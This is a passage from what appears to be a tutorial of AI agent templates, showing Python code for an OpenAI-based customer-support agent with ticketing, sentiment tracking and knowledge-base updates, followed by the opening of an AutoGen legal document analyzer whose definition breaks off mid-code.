558 self._extract_knowledge_from_ticket(ticket)
559
560 return ticket
561
562 def _extract_knowledge_from_ticket(self, ticket: Dict[str, Any]):
563 """
564 Extract knowledge from a resolved ticket to improve the knowledge base.
565
566 Args:
567 ticket: Resolved support ticket
568 """
569 # Only process closed tickets with resolutions
570 if ticket["status"] != "closed" or not ticket["resolution"]:
571 return
572
573 try:
574 # Prepare the prompt for knowledge extraction
575 prompt = f"""Analyze this resolved support ticket and identify any knowledge that should be added to our knowledge base.
576
577TICKET DETAILS:
578Inquiry: {ticket['inquiry']}
579Category: {ticket['category']}
580Resolution: {ticket['resolution']}
581
582Extract the following:
5831. What key information helped resolve this issue?
5842. Is this a common issue that should be added to FAQs or troubleshooting?
5853. What category in the knowledge base would this information belong to?
5864. What key/title would be appropriate for this entry?
5875. What content should be included?
588
589Return as a JSON object with suggested_category, suggested_key, suggested_content, and confidence (0-1) indicating how strongly you believe this should be added to the knowledge base.
590"""
591
592 # Get response from OpenAI
593 response = client.chat.completions.create(
594 model="gpt-4-turbo",
595 messages=[
596 {"role": "system", "content": "You are a knowledge management specialist who extracts valuable information from support interactions to improve knowledge bases."},
597 {"role": "user", "content": prompt}
598 ],
599 temperature=0.3,
600 response_format={"type": "json_object"}
601 )
602
603 # Parse the response
604 knowledge = json.loads(response.choices[0].message.content)
605
606 # Only add to knowledge base if confidence is high enough
607 if knowledge.get("confidence", 0) >= 0.8:
608 category = knowledge.get("suggested_category")
609 key = knowledge.get("suggested_key")
610 content = knowledge.get("suggested_content")
611
612 if category and key and content:
613 # Ensure category exists
614 if category not in self.knowledge_base:
615 self.knowledge_base[category] = {}
616
617 # Add the new knowledge
618 self.knowledge_base[category][key] = content
619
620 # Save the updated knowledge base
621 self.save_knowledge_base()
622
623 logger.info(f"Added new knowledge to {category}/{key} from ticket {ticket['ticket_id']}")
624
625 except Exception as e:
626 logger.error(f"Error extracting knowledge from ticket: {e}")
627
628 def route_to_specialist(self, inquiry: str, customer_id: str = "anonymous") -> Dict[str, Any]:
629 """
630 Route a customer inquiry to the appropriate specialist based on content.
631
632 Args:
633 inquiry: Customer inquiry text
634 customer_id: Optional customer identifier
635
636 Returns:
637 Dictionary with routing results
638 """
639 # Categorize the inquiry
640 categorization = self.categorize_inquiry(inquiry)
641
642 # Create a support ticket
643 ticket = self.create_support_ticket(
644 customer_id=customer_id,
645 inquiry=inquiry,
646 category=categorization.get("primary_category", "general"),
647 priority=categorization.get("priority", "medium")
648 )
649
650 # Map primary category to specialist agent
651 specialist_mapping = {
652 "technical": self.technical_specialist,
653 "billing": self.billing_specialist,
654 "product": self.product_specialist,
655 "complaint": self.satisfaction_specialist,
656 "general": self.front_desk_agent
657 }
658
659 # Get the appropriate specialist
660 primary_category = categorization.get("primary_category", "general")
661 specialist = specialist_mapping.get(primary_category, self.front_desk_agent)
662
663 # Update ticket with assigned agent
664 self.update_ticket(
665 ticket_id=ticket["ticket_id"],
666 updates={"agent_assigned": specialist.name}
667 )
668
669 return {
670 "ticket_id": ticket["ticket_id"],
671 "specialist": specialist.name,
672 "category": primary_category,
673 "subcategory": categorization.get("subcategory", ""),
674 "priority": categorization.get("priority", "medium")
675 }
676
677 def handle_customer_message(self, message: str, customer_id: str = "anonymous", conversation_id: str = None) -> Dict[str, Any]:
678 """
679 Handle a customer message with the appropriate agent.
680
681 Args:
682 message: Customer message text
683 customer_id: Optional customer identifier
684 conversation_id: Optional conversation identifier
685
686 Returns:
687 Dictionary with response and metadata
688 """
689 # Generate conversation ID if not provided
690 if not conversation_id:
691 conversation_id = f"CONV-{uuid.uuid4().hex[:8]}"
692
693 # Initialize conversation history if needed
694 if conversation_id not in self.conversation_history:
695 self.conversation_history[conversation_id] = {
696 "customer_id": customer_id,
697 "created_at": datetime.datetime.now().isoformat(),
698 "updated_at": datetime.datetime.now().isoformat(),
699 "messages": [],
700 "sentiment_trend": [],
701 "active_ticket_id": None
702 }
703
704 # Analyze sentiment
705 sentiment = self.analyze_sentiment(message)
706
707 # Update sentiment trend
708 self.conversation_history[conversation_id]["sentiment_trend"].append({
709 "timestamp": datetime.datetime.now().isoformat(),
710 "sentiment_score": sentiment.get("sentiment_score", 0),
711 "emotion_label": sentiment.get("emotion_label", "neutral")
712 })
713
714 # Add customer message to history
715 self.conversation_history[conversation_id]["messages"].append({
716 "timestamp": datetime.datetime.now().isoformat(),
717 "sender": "customer",
718 "message": message,
719 "sentiment": sentiment
720 })
721
722 # Update timestamp
723 self.conversation_history[conversation_id]["updated_at"] = datetime.datetime.now().isoformat()
724
725 # Check if we need to create or update a ticket
726 active_ticket_id = self.conversation_history[conversation_id].get("active_ticket_id")
727
728 if not active_ticket_id:
729 # Route to specialist and create ticket
730 routing = self.route_to_specialist(message, customer_id)
731 active_ticket_id = routing.get("ticket_id")
732 specialist_name = routing.get("specialist")
733
734 # Update conversation with ticket ID
735 self.conversation_history[conversation_id]["active_ticket_id"] = active_ticket_id
736
737 # Select the appropriate specialist agent
738 if specialist_name == "TechnicalSpecialist":
739 specialist = self.technical_specialist
740 elif specialist_name == "BillingSpecialist":
741 specialist = self.billing_specialist
742 elif specialist_name == "ProductSpecialist":
743 specialist = self.product_specialist
744 elif specialist_name == "SatisfactionSpecialist":
745 specialist = self.satisfaction_specialist
746 else:
747 specialist = self.front_desk_agent
748 else:
749 # Get the existing ticket
750 ticket = self.tickets.get(active_ticket_id)
751
752 if ticket:
753 specialist_name = ticket.get("agent_assigned", "FrontDeskAgent")
754
755 # Select the appropriate specialist agent
756 if specialist_name == "TechnicalSpecialist":
757 specialist = self.technical_specialist
758 elif specialist_name == "BillingSpecialist":
759 specialist = self.billing_specialist
760 elif specialist_name == "ProductSpecialist":
761 specialist = self.product_specialist
762 elif specialist_name == "SatisfactionSpecialist":
763 specialist = self.satisfaction_specialist
764 else:
765 specialist = self.front_desk_agent
766
767 # Update ticket with latest message
768 self.update_ticket(
769 ticket_id=active_ticket_id,
770 updates={
771 "history": ticket["history"] + [{
772 "timestamp": datetime.datetime.now().isoformat(),
773 "action": "customer_message",
774 "details": f"Customer message: {message[:100]}..." if len(message) > 100 else message
775 }]
776 }
777 )
778 else:
779 # Ticket not found, use front desk agent
780 specialist = self.front_desk_agent
781
782 # Search knowledge base for relevant information
783 knowledge_results = self.search_knowledge_base(message)
784
785 # Create context from conversation history
786 context = self._prepare_conversation_context(conversation_id)
787
788 # Generate the prompt for the specialist
789 knowledge_context = ""
790 if knowledge_results:
791 knowledge_context = "Relevant knowledge base entries:\n"
792 for i, entry in enumerate(knowledge_results, 1):
793 knowledge_context += f"{i}. {entry['category']} - {entry['key']}:\n{entry['content']}\n\n"
794
795 prompt = f"""
796 You are responding to a customer inquiry. Use the conversation history and knowledge base to provide a helpful response.
797
798 CONVERSATION HISTORY:
799 {context}
800
801 CURRENT CUSTOMER MESSAGE:
802 {message}
803
804 {knowledge_context if knowledge_context else ""}
805
806 CUSTOMER SENTIMENT:
807 Sentiment Score: {sentiment.get('sentiment_score', 0)}
808 Emotion: {sentiment.get('emotion_label', 'neutral')}
809 Urgency: {sentiment.get('urgency_level', 'medium')}
810
811 Please provide a helpful, accurate response that addresses the customer's needs. Be empathetic and solution-oriented.
812 If you need more information to properly help the customer, politely ask for the specific details you need.
813 """
814
815 # Get response from the specialist
816 response = client.chat.completions.create(
817 model="gpt-4-turbo",
818 messages=[
819 {"role": "system", "content": specialist.system_message},
820 {"role": "user", "content": prompt}
821 ],
822 temperature=0.7,
823 max_tokens=1000
824 )
825
826 agent_response = response.choices[0].message.content
827
828 # Add agent response to conversation history
829 self.conversation_history[conversation_id]["messages"].append({
830 "timestamp": datetime.datetime.now().isoformat(),
831 "sender": "agent",
832 "agent": specialist.name,
833 "message": agent_response
834 })
835
836 # Save conversation history
837 self._save_conversation_history()
838
839 # Check if the issue is resolved
840 resolved = self._check_if_resolved(agent_response)
841 if resolved and active_ticket_id:
842 self.close_ticket(
843 ticket_id=active_ticket_id,
844 resolution=f"Resolved by {specialist.name}: {resolved.get('resolution_summary', 'Issue addressed')}"
845 )
846 # Clear active ticket from conversation
847 self.conversation_history[conversation_id]["active_ticket_id"] = None
848
849 return {
850 "response": agent_response,
851 "agent": specialist.name,
852 "conversation_id": conversation_id,
853 "sentiment": sentiment,
854 "ticket_id": active_ticket_id,
855 "resolved": resolved is not None
856 }
857
858 def _prepare_conversation_context(self, conversation_id: str) -> str:
859 """
860 Prepare conversation context from history.
861
862 Args:
863 conversation_id: Conversation identifier
864
865 Returns:
866 String with formatted conversation context
867 """
868 if conversation_id not in self.conversation_history:
869 return "No conversation history available."
870
871 # Get conversation history
872 conversation = self.conversation_history[conversation_id]
873 messages = conversation.get("messages", [])
874
875 # Format context (limiting to last 10 messages to avoid token limits)
876 context = ""
877 for msg in messages[-10:]:
878 sender = "Customer" if msg.get("sender") == "customer" else msg.get("agent", "Agent")
879 timestamp = msg.get("timestamp", "")
880 message = msg.get("message", "")
881
882 context += f"{sender} ({timestamp}):\n{message}\n\n"
883
884 return context
885
886 def _save_conversation_history(self):
887 """Save conversation history to a JSON file."""
888 try:
889 with open(self.history_path, 'w') as f:
890 json.dump(self.conversation_history, f, indent=2)
891 logger.info("Conversation history saved successfully")
892 except Exception as e:
893 logger.error(f"Error saving conversation history: {e}")
894
895 def _check_if_resolved(self, agent_response: str) -> Optional[Dict[str, Any]]:
896 """
897 Check if the agent response indicates the issue is resolved.
898
899 Args:
900 agent_response: Agent's response text
901
902 Returns:
903 Dictionary with resolution info if resolved, None otherwise
904 """
905 try:
906 # Use OpenAI to determine if the issue is resolved
907 prompt = f"""Analyze this customer support agent's response and determine if it indicates the customer issue has been fully resolved.
908
909AGENT RESPONSE:
910{agent_response}
911
912Consider:
9131. Does the response indicate that all customer questions/issues have been addressed?
9142. Is the agent concluding the conversation or are they expecting further input?
9153. Is the response a complete solution or just a step in the troubleshooting process?
916
917Return a JSON object with:
9181. is_resolved: boolean indicating if the issue appears fully resolved
9192. resolution_type: "complete", "partial", or "not_resolved"
9203. resolution_summary: Brief summary of the resolution if applicable
9214. confidence: 0-1 score of how confident you are in this assessment
922"""
923
924 response = client.chat.completions.create(
925 model="gpt-4-turbo",
926 messages=[
927 {"role": "system", "content": "You are a customer support quality assurance specialist who evaluates if issues have been resolved."},
928 {"role": "user", "content": prompt}
929 ],
930 temperature=0.1,
931 response_format={"type": "json_object"}
932 )
933
934 # Parse the response
935 resolution_check = json.loads(response.choices[0].message.content)
936
937 # Only consider it resolved if confidence is high and is_resolved is true
938 if (resolution_check.get("is_resolved", False) and
939 resolution_check.get("confidence", 0) >= 0.8 and
940 resolution_check.get("resolution_type") == "complete"):
941
942 return resolution_check
943
944 return None
945
946 except Exception as e:
947 logger.error(f"Error checking resolution: {e}")
948 return None
949
950 def update_knowledge_base_entry(self, category: str, key: str, content: str) -> bool:
951 """
952 Add or update an entry in the knowledge base.
953
954 Args:
955 category: Category (products, faqs, troubleshooting, policies, response_templates)
956 key: Entry key/ID
957 content: Entry content
958
959 Returns:
960 Boolean indicating success
961 """
962 try:
963 # Ensure category exists
964 if category not in self.knowledge_base:
965 self.knowledge_base[category] = {}
966
967 # Add or update the entry
968 self.knowledge_base[category][key] = content
969
970 # Save the knowledge base
971 self.save_knowledge_base()
972
973 logger.info(f"Updated knowledge base entry: {category}/{key}")
974 return True
975
976 except Exception as e:
977 logger.error(f"Error updating knowledge base: {e}")
978 return False
979
980 def get_customer_sentiment_trend(self, customer_id: str) -> Dict[str, Any]:
981 """
982 Get sentiment trend for a specific customer across conversations.
983
984 Args:
985 customer_id: Customer identifier
986
987 Returns:
988 Dictionary with sentiment trend analysis
989 """
990 # Find all conversations for this customer
991 customer_conversations = {
992 conv_id: conv_data for conv_id, conv_data in self.conversation_history.items()
993 if conv_data.get("customer_id") == customer_id
994 }
995
996 if not customer_conversations:
997 return {
998 "customer_id": customer_id,
999 "conversations_count": 0,
1000 "average_sentiment": 0,
1001 "sentiment_trend": []
1002 }
1003
1004 # Extract all sentiment data points
1005 all_sentiment_data = []
1006 for conv_id, conv_data in customer_conversations.items():
1007 for sentiment_entry in conv_data.get("sentiment_trend", []):
1008 all_sentiment_data.append({
1009 "timestamp": sentiment_entry.get("timestamp"),
1010 "score": sentiment_entry.get("sentiment_score", 0),
1011 "emotion": sentiment_entry.get("emotion_label", "neutral"),
1012 "conversation_id": conv_id
1013 })
1014
1015 # Sort by timestamp
1016 all_sentiment_data.sort(key=lambda x: x.get("timestamp", ""))
1017
1018 # Calculate average sentiment
1019 avg_sentiment = sum(entry.get("score", 0) for entry in all_sentiment_data) / len(all_sentiment_data) if all_sentiment_data else 0
1020
1021 # Count emotion types
1022 emotion_counts = {}
1023 for entry in all_sentiment_data:
1024 emotion = entry.get("emotion", "neutral")
1025 emotion_counts[emotion] = emotion_counts.get(emotion, 0) + 1
1026
1027 # Calculate sentiment trend over time
1028 trend_points = []
1029 if len(all_sentiment_data) > 1:
1030 # Group by day for longer periods
1031 days = {}
1032 for entry in all_sentiment_data:
1033 try:
1034 date_str = entry.get("timestamp", "").split("T")[0]
1035 if date_str not in days:
1036 days[date_str] = []
1037 days[date_str].append(entry.get("score", 0))
1038 except:
1039 pass
1040
1041 for date_str, scores in days.items():
1042 avg_score = sum(scores) / len(scores)
1043 trend_points.append({
1044 "date": date_str,
1045 "average_sentiment": avg_score
1046 })
1047
1048 # Sort by date
1049 trend_points.sort(key=lambda x: x.get("date", ""))
1050
1051 return {
1052 "customer_id": customer_id,
1053 "conversations_count": len(customer_conversations),
1054 "interactions_count": len(all_sentiment_data),
1055 "average_sentiment": avg_sentiment,
1056 "emotion_distribution": emotion_counts,
1057 "sentiment_trend": trend_points
1058 }
1059
1060 def generate_support_insights(self) -> Dict[str, Any]:
1061 """
1062 Generate insights from support interactions.
1063
1064 Returns:
1065 Dictionary with support insights
1066 """
1067 insights = {
1068 "tickets": {
1069 "total": len(self.tickets),
1070 "open": sum(1 for t in self.tickets.values() if t.get("status") == "open"),
1071 "closed": sum(1 for t in self.tickets.values() if t.get("status") == "closed"),
1072 "by_category": {},
1073 "by_priority": {},
1074 "avg_resolution_time": 0
1075 },
1076 "sentiment": {
1077 "average": 0,
1078 "distribution": {}
1079 },
1080 "common_issues": [],
1081 "knowledge_gaps": [],
1082 "top_performing_responses": []
1083 }
1084
1085 # Calculate ticket statistics
1086 if self.tickets:
1087 # Count by category
1088 for ticket in self.tickets.values():
1089 category = ticket.get("category", "uncategorized")
1090 insights["tickets"]["by_category"][category] = insights["tickets"]["by_category"].get(category, 0) + 1
1091
1092 priority = ticket.get("priority", "medium")
1093 insights["tickets"]["by_priority"][priority] = insights["tickets"]["by_priority"].get(priority, 0) + 1
1094
1095 # Calculate average resolution time for closed tickets
1096 closed_tickets = [t for t in self.tickets.values() if t.get("status") == "closed" and t.get("resolution_time")]
1097 if closed_tickets:
1098 avg_time = sum(t.get("resolution_time", 0) for t in closed_tickets) / len(closed_tickets)
1099 insights["tickets"]["avg_resolution_time"] = avg_time
1100
1101 # Calculate sentiment statistics
1102 all_sentiment_scores = []
1103 emotion_counts = {}
1104
1105 for conv_data in self.conversation_history.values():
1106 for sentiment_entry in conv_data.get("sentiment_trend", []):
1107 score = sentiment_entry.get("sentiment_score", 0)
1108 all_sentiment_scores.append(score)
1109
1110 emotion = sentiment_entry.get("emotion_label", "neutral")
1111 emotion_counts[emotion] = emotion_counts.get(emotion, 0) + 1
1112
1113 if all_sentiment_scores:
1114 insights["sentiment"]["average"] = sum(all_sentiment_scores) / len(all_sentiment_scores)
1115 insights["sentiment"]["distribution"] = emotion_counts
1116
1117 # Identify common issues and knowledge gaps
1118 try:
1119 # Use OpenAI to analyze tickets and identify patterns
1120 # First, prepare a summary of closed tickets
1121 closed_tickets_sample = [t for t in self.tickets.values() if t.get("status") == "closed"]
1122 # Limit to 20 tickets to avoid token limits
1123 closed_tickets_sample = closed_tickets_sample[:20] if len(closed_tickets_sample) > 20 else closed_tickets_sample
1124
1125 tickets_summary = []
1126 for ticket in closed_tickets_sample:
1127 tickets_summary.append({
1128 "inquiry": ticket.get("inquiry", ""),
1129 "category": ticket.get("category", ""),
1130 "resolution": ticket.get("resolution", ""),
1131 "resolution_time": ticket.get("resolution_time", 0)
1132 })
1133
1134 if tickets_summary:
1135 prompt = """Analyze these resolved support tickets and identify:
1136 1. Common issues that customers are experiencing
1137 2. Knowledge gaps where we might need more documentation
1138 3. Most effective responses that led to positive outcomes
1139
1140 Return a JSON object with common_issues (array), knowledge_gaps (array), and top_performing_responses (array).
1141 """
1142
1143 response = client.chat.completions.create(
1144 model="gpt-4-turbo",
1145 messages=[
1146 {"role": "system", "content": "You are a customer support analytics specialist who identifies patterns and insights from support data."},
1147 {"role": "user", "content": prompt + "\n\nTickets: " + json.dumps(tickets_summary)}
1148 ],
1149 temperature=0.3,
1150 response_format={"type": "json_object"}
1151 )
1152
1153 analysis = json.loads(response.choices[0].message.content)
1154
1155 if "common_issues" in analysis:
1156 insights["common_issues"] = analysis["common_issues"]
1157 if "knowledge_gaps" in analysis:
1158 insights["knowledge_gaps"] = analysis["knowledge_gaps"]
1159 if "top_performing_responses" in analysis:
1160 insights["top_performing_responses"] = analysis["top_performing_responses"]
1161
1162 except Exception as e:
1163 logger.error(f"Error generating support insights: {e}")
1164
1165 return insights
1166
1167# Example usage
1168if __name__ == "__main__":
1169 # Initialize the agent with a sample knowledge base
1170 support_agent = CustomerSupportAgent()
1171
1172 # Add some entries to the knowledge base
1173 support_agent.update_knowledge_base_entry(
1174 category="products",
1175 key="premium_subscription",
1176 content="""
1177 Premium Subscription includes:
1178 - Unlimited access to all features
1179 - Priority customer support
1180 - Advanced analytics
1181 - Team collaboration tools
1182 - Custom integrations
1183
1184 Price: $49.99/month or $499.90/year (save 2 months)
1185 """
1186 )
1187
1188 support_agent.update_knowledge_base_entry(
1189 category="troubleshooting",
1190 key="login_issues",
1191 content="""
1192 Common login issues and solutions:
1193
1194 1. Forgotten password: Use the "Forgot Password" link on the login page to reset your password via email.
1195
1196 2. Account locked: After 5 failed login attempts, accounts are temporarily locked for 30 minutes. Contact support if you need immediate access.
1197
1198 3. Email verification needed: New accounts require email verification. Check your inbox and spam folder for the verification email.
1199
1200 4. Browser issues: Try clearing your browser cache and cookies, or use a different browser.
1201
1202 5. VPN interference: Some corporate VPNs may block access. Try connecting without VPN or contact your IT department.
1203 """
1204 )
1205
1206 support_agent.update_knowledge_base_entry(
1207 category="faqs",
1208 key="cancellation_policy",
1209 content="""
1210 Cancellation Policy:
1211
1212 - You can cancel your subscription at any time from your account settings.
1213 - For monthly subscriptions, cancellation takes effect at the end of the current billing period.
1214 - For annual subscriptions, you may request a prorated refund within 30 days of payment.
1215 - No refunds are provided for monthly subscriptions.
1216 - Data is retained for 30 days after cancellation before being permanently deleted.
1217 """
1218 )
1219
1220 # Sample customer conversation
1221 customer_message = "I'm having trouble logging in to my account. I've tried resetting my password but I'm not receiving the reset email."
1222
1223 # Process the message
1224 response = support_agent.handle_customer_message(
1225 message=customer_message,
1226 customer_id="CUST12345"
1227 )
1228
1229 print("Customer:", customer_message)
1230 print("\nAgent:", response["response"])
1231 print("\nSentiment:", response["sentiment"])
1232 print("Ticket ID:", response["ticket_id"])
1233
1234 # Follow-up message
1235 follow_up = "I checked my spam folder and still don't see it. I'm using gmail."
1236
1237 follow_up_response = support_agent.handle_customer_message(
1238 message=follow_up,
1239 customer_id="CUST12345",
1240 conversation_id=response["conversation_id"]
1241 )
1242
1243 print("\nCustomer:", follow_up)
1244 print("\nAgent:", follow_up_response["response"])

Usage Example:

python
1from customer_support_agent import CustomerSupportAgent
2
3# Initialize agent
4agent = CustomerSupportAgent()
5
6# Add knowledge base entries
7agent.update_knowledge_base_entry(
8 category="products",
9 key="starter_plan",
10 content="""
11 Starter Plan Details:
12 - 5 users included
13 - 100GB storage
14 - Email support only
15 - Basic analytics
16 - $9.99/month or $99/year
17 """
18)
19
20agent.update_knowledge_base_entry(
21 category="troubleshooting",
22 key="mobile_sync_issues",
23 content="""
24 Mobile Sync Troubleshooting:
25 1. Ensure you're using the latest app version
26 2. Check your internet connection
27 3. Try logging out and back in
28 4. Verify background data usage is enabled
29 5. Clear app cache in your device settings
30
31 If problems persist, please provide:
32 - Device model
33 - OS version
34 - App version
35 - Specific error message
36 """
37)
38
39# Start conversation
40conversation_id = None
41customer_id = "customer_789"
42
43# Initial inquiry
44inquiry = "Hi, the mobile app isn't syncing my latest changes. I'm on an iPhone 13."
45
46response = agent.handle_customer_message(
47 message=inquiry,
48 customer_id=customer_id
49)
50
51conversation_id = response["conversation_id"]
52print(f"AGENT ({response['agent']}): {response['response']}")
53
54# Follow-up message
55follow_up = "I've tried updating and restarting, but it's still not working. I'm getting an error that says 'Sync failed: Error code 403'"
56
57follow_up_response = agent.handle_customer_message(
58 message=follow_up,
59 customer_id=customer_id,
60 conversation_id=conversation_id
61)
62
63print(f"AGENT ({follow_up_response['agent']}): {follow_up_response['response']}")
64
65# Resolution message
66resolution = "That worked! I can see my changes now. Thanks for your help."
67
68resolution_response = agent.handle_customer_message(
69 message=resolution,
70 customer_id=customer_id,
71 conversation_id=conversation_id
72)
73
74print(f"AGENT ({resolution_response['agent']}): {resolution_response['response']}")
75
76# Get customer sentiment trend
77sentiment_trend = agent.get_customer_sentiment_trend(customer_id)
78print("\nCUSTOMER SENTIMENT ANALYSIS:")
79print(f"Average sentiment: {sentiment_trend['average_sentiment']:.2f}")
80print(f"Emotion distribution: {sentiment_trend['emotion_distribution']}")
81
82# Generate support insights
83insights = agent.generate_support_insights()
84print("\nSUPPORT INSIGHTS:")
85print(f"Total tickets: {insights['tickets']['total']}")
86print(f"Open tickets: {insights['tickets']['open']}")
87print(f"Average resolution time: {insights['tickets']['avg_resolution_time']:.2f} seconds")
88if insights['common_issues']:
89 print("\nCommon issues identified:")
90 for issue in insights['common_issues']:
91 print(f"- {issue}")

This AI Customer Support agent template demonstrates key enterprise patterns:

  1. Specialized Agents: Different agents handle specific aspects of customer support (technical, billing, etc.)
  2. Sentiment Analysis: Tracks customer emotions to identify satisfaction issues
  3. Knowledge Management: Dynamically improves knowledge base from successful resolutions
  4. Ticket System Integration: Creates and updates support tickets based on conversations
  5. Continuous Learning: Extracts insights to identify common issues and knowledge gaps

AI-Powered Legal Document Analyzer (Case Law Research & Compliance)

This AI agent template is designed to analyze legal documents, extract key information, identify relevant precedents, and assess compliance requirements. It provides legal professionals with comprehensive document analysis and research capabilities.

Core Capabilities:

  • Legal document parsing and clause extraction
  • Case law research and precedent identification
  • Compliance requirement analysis
  • Risk assessment and issue spotting
  • Legal summary and recommendation generation
  • Citation verification and validation

Architecture:

Legal Document Analyzer Architecture

Implementation Example:

python
1# legal_document_analyzer.py
2import os
3import json
4import datetime
5import uuid
6import re
7import pandas as pd
8import numpy as np
9import autogen
10import openai
11from typing import Dict, List, Any, Optional, Union, Tuple
12
13# Configure API keys and settings
14OPENAI_API_KEY = os.environ.get("OPENAI_API_KEY", "your-api-key")
15
16# Initialize OpenAI client
17client = openai.OpenAI(api_key=OPENAI_API_KEY)
18
19class LegalDocumentAnalyzer:
20 """
21 An AI-powered legal document analyzer that extracts information, identifies
22 precedents, and assesses compliance requirements.
23 """
24
25 def __init__(self, config=None):
26 """
27 Initialize the Legal Document Analyzer.
28
29 Args:
30 config: Optional configuration dictionary
31 """
32 self.config = config or {}
33
34 # Case law database file path
35 self.case_law_db_path = self.config.get("case_law_db_path", "case_law_database.json")
36
37 # Load case law database if it exists, otherwise create an empty one
38 self.case_law_db = self._load_case_law_db()
39
40 # Compliance requirements database file path
41 self.compliance_db_path = self.config.get("compliance_db_path", "compliance_database.json")
42
43 # Load compliance database if it exists, otherwise create an empty one
44 self.compliance_db = self._load_compliance_db()
45
46 # Document analysis history
47 self.analysis_history = {}
48
49 # Load analysis history if available
50 self.history_path = self.config.get("history_path", "analysis_history.json")
51 if os.path.exists(self.history_path):
52 try:
53 with open(self.history_path, 'r') as f:
54 self.analysis_history = json.load(f)
55 except Exception as e:
56 print(f"Error loading analysis history: {e}")
57
58 # Set up agent configuration
59 self.llm_config = {
60 "config_list": [{"model": "gpt-4-turbo", "api_key": OPENAI_API_KEY}],
61 "temperature": 0.2,
62 "timeout": 180
63 }
64
65 # Create the agent team
66 self._create_agent_team()
67
68 def _load_case_law_db(self) -> Dict:
69 """
70 Load the case law database from a JSON file.
71
72 Returns:
73 Dictionary containing the case law database
74 """
75 if os.path.exists(self.case_law_db_path):
76 try:
77 with open(self.case_law_db_path, 'r') as f:
78 return json.load(f)
79 except Exception as e:
80 print(f"Error loading case law database: {e}")
81
82 # If file doesn't exist or has errors, initialize with empty structure
83 return {
84 "cases": {},
85 "jurisdictions": {},
86 "areas_of_law": {},
87 "citations": {}
88 }
89
90 def _load_compliance_db(self) -> Dict:
91 """
92 Load the compliance requirements database from a JSON file.
93
94 Returns:
95 Dictionary containing the compliance database
96 """
97 if os.path.exists(self.compliance_db_path):
98 try:
99 with open(self.compliance_db_path, 'r') as f:
100 return json.load(f)
101 except Exception as e:
102 print(f"Error loading compliance database: {e}")
103
104 # If file doesn't exist or has errors, initialize with empty structure
105 return {
106 "regulations": {},
107 "jurisdictions": {},
108 "industries": {},
109 "requirements": {}
110 }
111
112 def save_case_law_db(self):
113 """Save the case law database to a JSON file."""
114 try:
115 with open(self.case_law_db_path, 'w') as f:
116 json.dump(self.case_law_db, f, indent=2)
117 print("Case law database saved successfully")
118 except Exception as e:
119 print(f"Error saving case law database: {e}")
120
121 def save_compliance_db(self):
122 """Save the compliance database to a JSON file."""
123 try:
124 with open(self.compliance_db_path, 'w') as f:
125 json.dump(self.compliance_db, f, indent=2)
126 print("Compliance database saved successfully")
127 except Exception as e:
128 print(f"Error saving compliance database: {e}")
129
130 def _create_agent_team(self):
131 """Create the team of specialized agents for legal document analysis."""
132
133 # 1. Document Parser - Specialized in extracting structured information from legal documents
134 self.document_parser = autogen.AssistantAgent(
135 name="DocumentParser",
136 system_message="""You are an expert legal document parser who specializes in extracting structured
137 information from legal documents of all types.
138
139 Your responsibilities:
140 1. Extract key information from legal documents (contracts, legislation, case law, etc.)
141 2. Identify and categorize legal clauses and provisions
142 3. Recognize parties, dates, obligations, and other critical elements
143 4. Identify the document type and purpose
144 5. Detect jurisdiction and governing law
145
146 Be thorough, precise, and comprehensive in your extraction. Focus on identifying the complete
147 structure of the document including sections, clauses, and subclauses. Recognize legal terminology
148 accurately. Maintain the hierarchical relationships between different parts of the document.
149 Extract all relevant metadata such as dates, parties, jurisdictions, and subject matter.""",
150 llm_config=self.llm_config
151 )
152
153 # 2. Legal Researcher - Specialized in case law and precedent research
154 self.legal_researcher = autogen.AssistantAgent(
155 name="LegalResearcher",
156 system_message="""You are an expert legal researcher who specializes in finding relevant
157 case law, statutes, regulations, and legal precedents.
158
159 Your responsibilities:
160 1. Identify relevant legal authorities based on document content
161 2. Find and analyze case law precedents that may impact interpretation
162 3. Research statutes and regulations applicable to the document
163 4. Examine how courts have interpreted similar language or provisions
164 5. Identify potential conflicts between the document and existing law
165
166 Be thorough, precise, and focused on finding the most relevant legal authorities. Consider
167 different jurisdictions when appropriate. Provide accurate citations for all legal authorities.
168 Analyze how courts have interpreted similar provisions. Consider both supporting and contradicting
169 precedents. Evaluate the strength and applicability of different legal authorities.""",
170 llm_config=self.llm_config
171 )
172
173 # 3. Compliance Analyst - Specialized in compliance requirements
174 self.compliance_analyst = autogen.AssistantAgent(
175 name="ComplianceAnalyst",
176 system_message="""You are an expert compliance analyst who specializes in identifying
177 regulatory requirements and assessing documents for compliance issues.
178
179 Your responsibilities:
180 1. Identify applicable regulations and compliance requirements
181 2. Assess whether the document meets regulatory standards
182 3. Flag potential compliance issues or violations
183 4. Recommend changes to address compliance concerns
184 5. Analyze industry-specific regulatory considerations
185
186 Be thorough, detail-oriented, and comprehensive in your compliance analysis. Consider
187 multiple jurisdictions and regulatory frameworks. Identify both explicit compliance issues
188 and potential gray areas. Provide specific references to relevant regulations. Consider
189 industry-specific compliance requirements. Evaluate both the letter and spirit of regulations.""",
190 llm_config=self.llm_config
191 )
192
193 # 4. Issue Spotter - Specialized in identifying legal risks and issues
194 self.issue_spotter = autogen.AssistantAgent(
195 name="IssueSpotter",
196 system_message="""You are an expert legal issue spotter who specializes in identifying
197 potential legal risks, ambiguities, and problematic provisions in legal documents.
198
199 Your responsibilities:
200 1. Identify ambiguous language or provisions that could lead to disputes
201 2. Spot potential legal risks or liabilities
202 3. Detect missing provisions or protections
203 4. Analyze enforceability concerns
204 5. Identify conflicts between different parts of the document
205
206 Be thorough, critical, and anticipate potential problems. Look for ambiguities in language
207 that could be interpreted in multiple ways. Identify provisions that may be unenforceable.
208 Consider practical implementation challenges. Look for missing provisions that should be
209 included. Identify protections that would benefit each party. Consider worst-case scenarios
210 and how the document would apply.""",
211 llm_config=self.llm_config
212 )
213
214 # 5. Legal Summarizer - Specialized in creating comprehensive legal summaries
215 self.legal_summarizer = autogen.AssistantAgent(
216 name="LegalSummarizer",
217 system_message="""You are an expert legal summarizer who specializes in creating clear,
218 comprehensive summaries of complex legal documents and analyses.
219
220 Your responsibilities:
221 1. Synthesize key information from legal documents into clear summaries
222 2. Highlight the most important provisions, risks, and considerations
223 3. Organize information logically and hierarchically
224 4. Translate complex legal concepts into accessible language
225 5. Create executive summaries for non-legal audiences when needed
226
227 Be comprehensive while focusing on what matters most. Structure your summaries logically
228 with clear sections and headings. Use precise language while avoiding unnecessary legal
229 jargon. Distinguish between major and minor points. Include all critical information while
230 being concise. Create different levels of detail appropriate for different audiences.""",
231 llm_config=self.llm_config
232 )
233
234 # User proxy agent for orchestrating the workflow
235 self.user_proxy = autogen.UserProxyAgent(
